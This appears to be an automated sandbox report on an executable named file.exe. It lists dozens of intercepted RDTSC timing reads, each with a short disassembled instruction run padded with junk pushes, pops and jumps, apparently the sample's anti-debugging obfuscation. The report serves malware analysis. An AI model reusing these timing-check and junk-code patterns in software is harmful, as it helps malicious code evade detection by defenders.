                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5103B second address: A51063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F0BF8E3D572h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F0BF8E3D566h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51063 second address: A51067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A51067 second address: A5109E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0BF8E3D566h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0BF8E3D56Fh 0x00000011 push edi 0x00000012 jmp 00007F0BF8E3D579h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53D83 second address: A53DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jmp 00007F0BF9145136h 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53DA4 second address: A53DC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F0BF8E3D56Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push ecx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53DC3 second address: A53DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0BF9145126h 0x0000000a popad 0x0000000b pop ecx 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53DD5 second address: A53DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53DE6 second address: A53DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53DEA second address: A53DEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53E3C second address: A53E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53E43 second address: A53E7F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0BF8E3D575h 0x0000000e nop 0x0000000f mov ecx, dword ptr [ebp+122D1C45h] 0x00000015 push 00000000h 0x00000017 mov dword ptr [ebp+122D1C91h], edx 0x0000001d push B6C76264h 0x00000022 je 00007F0BF8E3D584h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53E7F second address: A53F14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145136h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 49389E1Ch 0x00000010 push esi 0x00000011 mov edi, 3F5C253Fh 0x00000016 pop ecx 0x00000017 push 00000003h 0x00000019 jo 00007F0BF9145130h 0x0000001f pushad 0x00000020 mov dx, bx 0x00000023 mov esi, 52A2E0CEh 0x00000028 popad 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D2D9Ch], esi 0x00000031 mov dword ptr [ebp+122D233Bh], edx 0x00000037 push 00000003h 0x00000039 and si, 4B9Bh 0x0000003e mov edx, edi 0x00000040 push 566DF5D3h 0x00000045 push edx 0x00000046 jl 00007F0BF9145128h 0x0000004c push eax 0x0000004d pop eax 0x0000004e pop edx 0x0000004f add dword ptr [esp], 69920A2Dh 0x00000056 mov cl, 6Ah 0x00000058 lea ebx, dword ptr [ebp+12445CB4h] 0x0000005e mov esi, 5373A63Ch 0x00000063 pushad 0x00000064 mov ax, si 0x00000067 sub ecx, dword ptr [ebp+122D2121h] 0x0000006d popad 0x0000006e xchg eax, ebx 0x0000006f push ecx 0x00000070 push ecx 0x00000071 jg 00007F0BF9145126h 0x00000077 pop ecx 0x00000078 pop ecx 0x00000079 push eax 0x0000007a push esi 0x0000007b pushad 0x0000007c js 00007F0BF9145126h 0x00000082 push eax 0x00000083 push edx 0x00000084 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53F62 second address: A53F70 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A53F70 second address: A54002 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov ecx, dword ptr [ebp+122D30EAh] 0x0000000e push 00000000h 0x00000010 xor dword ptr [ebp+122D2000h], edx 0x00000016 push F6D79EDEh 0x0000001b jmp 00007F0BF9145134h 0x00000020 add dword ptr [esp], 092861A2h 0x00000027 jo 00007F0BF9145142h 0x0000002d push ebx 0x0000002e call 00007F0BF9145139h 0x00000033 pop edx 0x00000034 pop edi 0x00000035 push 00000003h 0x00000037 xor dword ptr [ebp+122D24F9h], esi 0x0000003d pushad 0x0000003e mov dword ptr [ebp+122D1F99h], esi 0x00000044 popad 0x00000045 push 00000000h 0x00000047 push 00000003h 0x00000049 and ecx, 2C573321h 0x0000004f call 00007F0BF9145129h 0x00000054 jmp 00007F0BF9145131h 0x00000059 push eax 0x0000005a push ecx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A54002 second address: A54006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A54006 second address: A54016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A54016 second address: A5401A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A540EC second address: A54196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF9145139h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d pushad 0x0000000e js 00007F0BF914512Ch 0x00000014 add eax, 7A31BC67h 0x0000001a popad 0x0000001b push 00000000h 0x0000001d call 00007F0BF9145129h 0x00000022 jmp 00007F0BF9145139h 0x00000027 push eax 0x00000028 jmp 00007F0BF914512Dh 0x0000002d mov eax, dword ptr [esp+04h] 0x00000031 pushad 0x00000032 jmp 00007F0BF9145137h 0x00000037 jns 00007F0BF9145137h 0x0000003d jmp 00007F0BF9145131h 0x00000042 popad 0x00000043 mov eax, dword ptr [eax] 0x00000045 jng 00007F0BF9145138h 0x0000004b pushad 0x0000004c jmp 00007F0BF914512Ah 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A54196 second address: A54217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a push edi 0x0000000b jg 00007F0BF8E3D566h 0x00000011 pop edi 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 popad 0x00000017 pop eax 0x00000018 mov di, 2EAFh 0x0000001c push 00000003h 0x0000001e push 00000000h 0x00000020 jp 00007F0BF8E3D56Ch 0x00000026 mov edx, dword ptr [ebp+122D29C4h] 0x0000002c push 00000003h 0x0000002e mov edx, dword ptr [ebp+122D2AF8h] 0x00000034 call 00007F0BF8E3D569h 0x00000039 push edi 0x0000003a push ebx 0x0000003b jmp 00007F0BF8E3D575h 0x00000040 pop ebx 0x00000041 pop edi 0x00000042 push eax 0x00000043 js 00007F0BF8E3D56Eh 0x00000049 mov eax, dword ptr [esp+04h] 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F0BF8E3D576h 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A54217 second address: A54226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BF914512Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7417C second address: A74183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74183 second address: A741A8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0BF9145128h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F0BF9145137h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A741A8 second address: A741C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D56Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jng 00007F0BF8E3D584h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A741C8 second address: A741CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3ABA0 second address: A3ABAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3ABAA second address: A3ABDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 jns 00007F0BF914513Fh 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F0BF9145126h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3ABDB second address: A3ABDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3ABDF second address: A3ABE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A720CA second address: A720E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jng 00007F0BF8E3D568h 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007F0BF8E3D56Eh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72257 second address: A7225C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A723AA second address: A723AF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7251E second address: A72523 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72CD9 second address: A72D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0BF8E3D585h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72D02 second address: A72D07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A72D07 second address: A72D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BF8E3D571h 0x00000009 jnc 00007F0BF8E3D566h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jmp 00007F0BF8E3D577h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73176 second address: A73194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jp 00007F0BF9145136h 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73315 second address: A7331B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A738E8 second address: A738EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A738EE second address: A738F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73D23 second address: A73D40 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0BF9145133h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73D40 second address: A73D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A73FC7 second address: A74000 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145138h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0BF9145137h 0x0000000e jno 00007F0BF9145126h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A74000 second address: A7403B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D577h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F0BF8E3D57Ah 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77D9F second address: A77DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77F93 second address: A77F97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77F97 second address: A77F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A78119 second address: A7811D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7811D second address: A78123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FB6C second address: A7FB78 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 js 00007F0BF8E3D566h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FB78 second address: A7FB81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FCAA second address: A7FCB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8271F second address: A8272F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8272F second address: A82734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82734 second address: A8275A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0BF9145131h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F0BF9145126h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82C8C second address: A82C96 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0BF8E3D56Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82D75 second address: A82D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82E21 second address: A82E41 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0BF8E3D576h 0x00000008 jmp 00007F0BF8E3D570h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A831BA second address: A831C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A831C6 second address: A831CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A83376 second address: A8337B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A83F3A second address: A83F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0BF8E3D570h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A83F51 second address: A83FB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007F0BF9145134h 0x0000000d mov esi, dword ptr [ebp+122D2A50h] 0x00000013 push 00000000h 0x00000015 movzx edi, di 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F0BF9145128h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov si, 299Ah 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b push ebx 0x0000003c jmp 00007F0BF9145132h 0x00000041 pop ebx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84A62 second address: A84A84 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0BF8E3D566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0BF8E3D56Eh 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push esi 0x00000017 pop esi 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A860DD second address: A860E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86C30 second address: A86C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A39082 second address: A39088 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A39088 second address: A390A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0BF8E3D573h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A88185 second address: A88195 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A390A3 second address: A390A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A390A7 second address: A390AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8B8C7 second address: A8B8D1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0BF8E3D566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8CE80 second address: A8CE85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8DFFB second address: A8DFFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D088 second address: A8D094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8DFFF second address: A8E01B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D578h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8EF0E second address: A8EF12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F047 second address: A8F085 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF8E3D570h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F0BF8E3D574h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0BF8E3D572h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A9004D second address: A90053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8F085 second address: A8F089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90E9A second address: A90F01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop esi 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, dword ptr [ebp+122D2B10h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007F0BF9145128h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 add edi, 458CAB41h 0x00000036 mov edi, 6A7CBE23h 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007F0BF9145128h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 00000014h 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push esi 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A90053 second address: A90057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
